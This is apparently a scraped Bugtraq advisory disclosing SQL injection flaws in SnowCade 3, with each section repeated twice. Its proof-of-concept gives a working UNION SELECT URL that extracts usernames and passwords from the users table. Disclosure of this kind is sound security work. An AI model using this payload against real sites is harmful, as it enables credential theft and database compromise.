SnowCade Multiple SQL Injection Vulnerabilities
BID:40984
Info
SnowCade Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 40984 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 19 2010 12:00AM |
| Updated: | Jun 21 2010 05:48PM |
| Credit: | ahwak2000 |
| Vulnerable: |
ArcadeCreate SnowCade 3 |
| Not Vulnerable: | |
Discussion
SnowCade Multiple SQL Injection Vulnerabilities
SnowCade is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SnowCade 3 is vulnerable; other versions may also be affected.
SnowCade is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SnowCade 3 is vulnerable; other versions may also be affected.
Exploit / POC
SnowCade Multiple SQL Injection Vulnerabilities
Attackers can exploit these issues with a web browser.
The following example URIs are available:
http://www.example.com/snowcade/index.php?action=browse&cat=31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--
http://www.example.com/[path]/index.php?action=playgame&gameid=[SQLI]
Attackers can exploit these issues with a web browser.
The following example URIs are available:
http://www.example.com/snowcade/index.php?action=browse&cat=31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--
http://www.example.com/[path]/index.php?action=playgame&gameid=[SQLI]
Solution / Fix
SnowCade Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].